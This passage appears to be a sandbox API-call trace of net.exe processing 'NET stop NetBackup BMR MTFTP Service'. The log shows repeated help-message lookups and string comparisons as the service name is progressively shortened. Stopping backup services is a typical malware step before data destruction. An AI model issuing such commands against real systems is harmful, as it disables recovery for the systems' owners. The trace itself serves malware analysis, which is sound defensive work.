Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģ఻") returned 0x18 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc58c00) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģా") returned 0x21 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET STATISTICS\r\n[WORKSTATION]\r\n\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc60378) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģు") returned 0x15 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0056.118] LocalFree (hMem=0xc58c00) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౄ") returned 0x58 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0056.118] LocalFree (hMem=0xc60378) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģే") returned 0x184 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0056.118] LocalFree (hMem=0xc60378) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģొ") returned 0xf0 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0056.118] LocalFree (hMem=0xc60378) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ్") returned 0x47 [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౐") returned 0xc2 [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౓") returned 0x28d [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౖ") returned 0x483 [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౙ") returned 0xa86 [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౜") returned 0x54 [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௼") returned 0xad [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:", _MaxCount=0x1c) returned 18 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௿") returned 0x2e [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET COMPUTER\r\n\\\\computername", _MaxCount=0x1c) returned 16 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģం") returned 0x7d [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET CONFIG SERVER\r\n[/AUTODIS", _MaxCount=0x1c) returned 16 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఅ") returned 0x26 [0056.119] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET CONFIG\r\n[SERVER | WORKST", _MaxCount=0x1c) returned 16 [0056.119] LocalFree (hMem=0xc60378) returned 0x0 [0056.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఈ") returned 0x19 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 16 [0056.120] LocalFree (hMem=0xc54268) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఋ") returned 0x1b [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1c) returned 13 [0056.120] LocalFree (hMem=0xc60378) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఎ") returned 0xbe [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET GROUP\r\n[groupname [/COMM", _MaxCount=0x1c) returned 12 [0056.120] LocalFree (hMem=0xc60378) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ఑") returned 0x33 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET HELP\r\ncommand\r\n -or-", _MaxCount=0x1c) returned 11 [0056.120] LocalFree (hMem=0xc60378) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఔ") returned 0x19 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1c) returned 11 [0056.120] LocalFree (hMem=0xc54268) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģగ") returned 0xc1 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET LOCALGROUP\r\n[groupname [", _MaxCount=0x1c) returned 7 [0056.120] LocalFree (hMem=0xc60378) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģచ") returned 0x16 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 3 [0056.120] LocalFree (hMem=0xc58c00) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఝ") returned 0x33 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET SESSION\r\n[\\\\computername", _MaxCount=0x1c) returned 15 [0056.120] LocalFree (hMem=0xc60378) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఠ") returned 0x234 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1c) returned 12 [0056.120] LocalFree (hMem=0xc60378) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģణ") returned 0x13 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START BROWSER\r\n", _MaxCount=0x1c) returned 14 [0056.120] LocalFree (hMem=0xc548a8) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģద") returned 0x14 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1c) returned 14 [0056.120] LocalFree (hMem=0xc54268) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģ఩") returned 0x14 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START NETLOGON\r\n", _MaxCount=0x1c) returned 14 [0056.120] LocalFree (hMem=0xc54268) returned 0x0 [0056.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="㟀Å\x9e蛬ģబ") returned 0x11 [0056.120] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START RPCSS\r\n", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc537c0) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģయ") returned 0x14 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc54268) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģల") returned 0x12 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START SERVER\r\n", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc548a8) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䑠Å\x9e蛬ģవ") returned 0xf [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START UPS\r\n", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc54460) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģస") returned 0x17 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc58c00) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģ఻") returned 0x18 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc58c00) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģా") returned 0x21 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET STATISTICS\r\n[WORKSTATION", _MaxCount=0x1c) returned 14 [0056.121] LocalFree (hMem=0xc60378) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģు") returned 0x15 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 19 [0056.121] LocalFree (hMem=0xc58c00) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౄ") returned 0x58 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET TIME\r\n\r\n[\\\\computername ", _MaxCount=0x1c) returned -1 [0056.121] LocalFree (hMem=0xc60378) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģే") returned 0x184 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET USE\r\n[devicename | *] [\\", _MaxCount=0x1c) returned -2 [0056.121] LocalFree (hMem=0xc60378) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģొ") returned 0xf0 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET USER\r\n[username [passwor", _MaxCount=0x1c) returned -2 [0056.121] LocalFree (hMem=0xc60378) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ్") returned 0x47 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET VIEW\r\n[\\\\computername [/", _MaxCount=0x1c) returned -3 [0056.121] LocalFree (hMem=0xc60378) returned 0x0 [0056.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౐") returned 0xc2 [0056.121] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET\r\n [ ACCOUNTS | COMPUT", _MaxCount=0x1c) returned 19 [0056.121] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౓") returned 0x28d [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="SERVICES\r\nNET START can be u", _MaxCount=0x1c) returned -5 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౖ") returned 0x483 [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="SYNTAX\r\nThe following conven", _MaxCount=0x1c) returned -5 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౙ") returned 0xa86 [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NAMES\r\nThe following types o", _MaxCount=0x1c) returned 4 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౜") returned 0x54 [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="\r\nFor more information on to", _MaxCount=0x1c) returned 97 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௼") returned 0xad [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET ACCOUNTS\r\n[/FORCEL", _MaxCount=0x16) returned 18 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௿") returned 0x2e [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET COMPUTER\r\n\\\\comput", _MaxCount=0x16) returned 16 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģం") returned 0x7d [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET CONFIG SERVER\r\n[/A", _MaxCount=0x16) returned 16 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఅ") returned 0x26 [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET CONFIG\r\n[SERVER | ", _MaxCount=0x16) returned 16 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఈ") returned 0x19 [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET CONTINUE\r\nservice\r", _MaxCount=0x16) returned 16 [0056.122] LocalFree (hMem=0xc54268) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఋ") returned 0x1b [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET FILE\r\n[id [/CLOSE]", _MaxCount=0x16) returned 13 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఎ") returned 0xbe [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET GROUP\r\n[groupname ", _MaxCount=0x16) returned 12 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ఑") returned 0x33 [0056.122] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x16) returned 11 [0056.122] LocalFree (hMem=0xc60378) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఔ") returned 0x19 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET HELPMSG\r\nmessage#\r", _MaxCount=0x16) returned 11 [0056.123] LocalFree (hMem=0xc54268) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģగ") returned 0xc1 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET LOCALGROUP\r\n[group", _MaxCount=0x16) returned 7 [0056.123] LocalFree (hMem=0xc60378) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģచ") returned 0x16 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x16) returned 3 [0056.123] LocalFree (hMem=0xc58c00) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఝ") returned 0x33 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET SESSION\r\n[\\\\comput", _MaxCount=0x16) returned 15 [0056.123] LocalFree (hMem=0xc60378) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఠ") returned 0x234 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET SHARE\r\nsharename\r\n", _MaxCount=0x16) returned 12 [0056.123] LocalFree (hMem=0xc60378) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģణ") returned 0x13 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START BROWSER\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc548a8) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģద") returned 0x14 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START EVENTLOG\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc54268) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģ఩") returned 0x14 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START NETLOGON\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc54268) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="㟀Å\x9e蛬ģబ") returned 0x11 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START RPCSS\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc537c0) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģయ") returned 0x14 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START SCHEDULE\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc54268) returned 0x0 [0056.123] FormatMessageW (in: 